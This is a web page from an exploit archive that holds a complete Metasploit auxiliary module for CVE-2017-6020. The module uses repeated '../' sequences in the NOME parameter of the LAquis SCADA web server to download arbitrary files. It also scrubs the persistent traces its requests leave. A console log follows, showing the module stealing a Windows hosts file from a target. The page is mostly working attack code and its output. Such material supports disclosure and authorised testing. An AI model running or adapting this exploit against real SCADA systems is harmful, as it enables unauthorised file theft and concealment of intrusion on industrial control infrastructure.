LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)

James Fitts 2017-09-27 remote multiple
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'LAquis SCADA Web Server Directory Traversal Information Disclosure',
			'Description'    => %q{
				This module exploits a directory traversal vulnerability found in the LAquis SCADA 
				application. The vulnerability is triggered when sending a series of dot dot slashes
				(../) to the vulnerable NOME parameter found on the listagem.laquis file.

				This module was tested against v4.1.0.2385
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2017-6020' ],
					[ 'ZDI', '17-286' ],
					[ 'BID', '97055' ],
					[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-082-01' ]
				],
			'DisclosureDate' => 'Mar 29 2017'))

		register_options(
			[
				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
				Opt::RPORT(1234)
			], self.class )
	end

	def run

	depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
	levels = "/" + ("../" * depth)

	res = send_request_raw({
		'method'	=>	'GET',
		'uri'			=>	'/'
	})

	# make sure the webserver is actually listening
	if res.code == 200
		blob = res.body.to_s.scan(/(?<=href=)[A-Za-z0-9.?=&+]+/)
		
		for url in blob
			if url =~ /listagem/
				listagem = url
			end
		end
		
		# make sure the vulnerable page is there
		# not all of the examples include the
		# vulnerable page, so we test to ensure
		# that it is there prior to executing our code
		# there is a potential that real world may not
		# include the vulnerable page in some cases
		# as well
		res = send_request_raw({
			'method'	=>	'GET',
			'uri'			=>	"/#{listagem}",
		})

		# trigger
		if res.code == 200 and res.body.to_s =~ /Listagem<\/title><\/head>/
			
			loot = []
			file_path = "#{datastore['FILE']}"
			file_path = file_path.gsub(/\//, "\\")
			cleanup = "#{listagem}"
			cleanup = cleanup.gsub(/DATA=/, "DATA=#{Rex::Text.rand_text_alphanumeric(15)}")
			cleanup = cleanup.gsub(/botao=Enviar\+consulta/, "botao=Submit\+Query")
			vulnerability = listagem.gsub(/(?<=NOME=)[A-Za-z0-9.]+/, "#{levels}#{file_path}")

			res = send_request_raw({
				'method'	=>	'GET',
				'uri'			=>	"/#{vulnerability}"
			})

			if res and res.code == 200
				blob = res.body.to_s
				blob.each_line do |line|
					loot << line.match(/.* <\/font><\/td>.*$/)
				end

				loot = loot.join.gsub(/ <\/font><\/td>/, "\r\n")

				if not loot or loot.empty?
					print_status("File from \'#{rhost}:#{rport}\' is empty...")
					return
				end
				file = ::File.basename(datastore['FILE'])
				path = store_loot('laquis.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
				print_status("Stored \'#{datastore['FILE']}\' to \'#{path}\'")

				# cleaning up afterwards because the response
				# data from before is written and becomes
				# persistent
				referer = cleanup.gsub(/DATA=[A-Za-z0-9]+/, "DATA=")

				res = send_request_raw({
					'method'	=>	'GET',
					'uri'			=>	"/#{listagem}"
				})

				if res.code == 200
					nome = res.body.to_s.match(/(?<=<input type=hidden name=NOME value=")[A-Za-z0-9.]+/)
					cleanup = cleanup.gsub(/(?<=NOME=)[A-Za-z0-9.]+/, "#{nome}")
					res = send_request_raw({
						'method'	=>	'GET',
						'uri'			=>	"/#{cleanup}",
						'headers'	=>	{
							'Referer'	=>	"http://#{rhost}:#{rport}/#{referer}",
							'Accept-Language'	=>	'en-US,en;q=0.5',
							'Accept-Encoding'	=>	'gzip, deflate',
							'Connection'	=>	'close',
							'Upgrade-Insecure-Requests'	=>	'1',
							'Cache-Control'	=>	'max-age=0'
						}
					})
				end

				return

			end

		else
			print_error("Vulnerable page does not exist...")
		end

	else
		print_error("The server does not appear to be listening...")
	end

	end
end
__END__
msf auxiliary(laquis_directory_traversal) > show options

Module options (auxiliary/server/laquis_directory_traversal):

   Name     Current Setting                     Required  Description
   ----     ---------------                     --------  -----------
   DEPTH    10                                  no        Levels to reach base directory
   FILE     Windows/System32/drivers/etc/hosts  no        This is the file to download
   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.1.2                         yes       The target address
   RPORT    1234                                yes       The target port (TCP)
   SSL      false                               no        Negotiate SSL/TLS for outgoing connections
   VHOST                                        no        HTTP server virtual host

msf auxiliary(laquis_directory_traversal) > rexploit
[*] Reloading module...

[*] Stored 'Windows/System32/drivers/etc/hosts' to '/home/james/.msf4/loot/20170927110756_default_192.168.1.2_laquis.file_227964.bin'
[*] Auxiliary module execution completed

james@bloop:~/.msf4/loot$ cat 20170927110456_default_192.168.1.2_laquis.file_677204.bin
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#
#</pre>
      </div>
    </div>
  </div>

  <div class="col-md-4">
    <div class="card my-4">
  <h5 class="card-header exploit-card-author">James Fitts</h5>
  <div class="text-left mb-2"></div>
  <div class="card-body">
    <div class="list-group list-group-flush">
                  <div class="list-group-item list-author-active">
        LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)      </div>
                        <a class="list-group-item" href="/exploits/show/?id=42725">
      Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)      </a>
                        <a class="list-group-item" href="/exploits/show/?id=42724">
      KingScada AlarmServer 3.1.2.13 - Remote Stack Buffer Overflow (Metasploit)      </a>
                        <a class="list-group-item" href="/exploits/show/?id=42723">
      haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (Metasploit)      </a>
                        <a class="list-group-item" href="/exploits/show/?id=42721">
      Lockstep Backup for Workgroups 4.0.3 - Remote Buffer Overflow (Metasploit)      </a>
                        <a class="list-group-item" href="/exploits/show/?id=42720">
      EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)      </a>
                        <a class="list-group-item" href="/exploits/show/?id=42719">
      EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)      </a>
                        <a class="list-group-item" href="/exploits/show/?id=42709">
      Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)      </a>
                        <a class="list-group-item" href="/exploits/show/?id=42708">
      Alienvault OSSIM av-centerd - Util.pm sync_rserver Command Execution (Metasploit)      </a>
                        <a class="list-group-item" href="/exploits/show/?id=42706">
      Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)      </a>
                </div>
  </div>
</div>

<div class="card my-4">
  <h5 class="card-header exploit-card-recent">Recent Exploits</h5>
  <div class="card-body">
    <div class="list-group list-group-flush">
              <a class="list-group-item" href="/exploits/show/?id=46658">
          FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)        </a>
              <a class="list-group-item" href="/exploits/show/?id=46657">
          AIDA64 Engineer 5.99.4900 - 'Load from file' Field Buffer Overflow (SEH)        </a>
              <a class="list-group-item" href="/exploits/show/?id=46656">
          Magic ISO Maker 5.5(build 281) - 'Serial Code' Denial of Service (PoC)        </a>
              <a class="list-group-item" href="/exploits/show/?id=46655">
          Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)        </a>
              <a class="list-group-item" href="/exploits/show/?id=46654">
          Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion        </a>
              <a class="list-group-item" href="/exploits/show/?id=46653">
          Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - 'ReadableStream' Internal Object Leak Type Confusion        </a>
              <a class="list-group-item" href="/exploits/show/?id=46652">
          Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion        </a>
              <a class="list-group-item" href="/exploits/show/?id=46651">
          WebKitGTK+ - 'ThreadedCompositor' Race Condition        </a>
              <a class="list-group-item" href="/exploits/show/?id=46650">
          WebKit JavaScriptCore - CodeBlock Dangling Watchpoints Use-After-Free        </a>
              <a class="list-group-item" href="/exploits/show/?id=46649">
          WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check        </a>
          </div>
  </div>
</div>
  </div>
</div>

<script>document.getElementById('s').focus();</script>

    
</div>
<!-- /.container -->

<!-- Footer -->
<footer class="py-5 container" style="border:0; border-top:1px solid #ccc;">
  <div class="row">
    <div class="col-md-10">
        <a href="https://twitter.com/irfantoor?ref_src=twsrc%5Etfw" class="twitter-follow-button" data-size="large" data-show-count="false">Follow @irfantoor</a>        
        <p class="m-0 text-dark">Copyright © <a href="/contact/irfantoor">Irfan TOOR</a> 2019</p>
        <p class="m-0 text-dark">Powered by: 
            <a href="/readme/irfantoor/app">
                Irfan's App 0.2.4            </a>
            « 
            <a href="/readme/irfantoor/engine">
                Irfan's Engine 2.0.1            </a>
        </p>
    </div>
    <div class="col-md-2 text-right">
        <a class="scroll-to-top rounded js-scroll-trigger text-dark btn btn-light" href="#page-top">
        <i class="fa fa-2x fa-angle-double-up"></i>
        </a>
    </div>
  </div>
</footer>

<!-- Bootstrap core JavaScript -->
<script src="/vendor/jquery/jquery.min.js"></script>
<script src="/vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

<!-- Plugin JavaScript -->
<script src="/vendor/jquery-easing/jquery.easing.min.js"></script>
<script src="/vendor/scrollreveal/scrollreveal.min.js"></script>
<script src="/vendor/magnific-popup/jquery.magnific-popup.min.js"></script>

<!-- Custom scripts for this template -->
<script src="/js/creative.js"></script>

</body>
</html>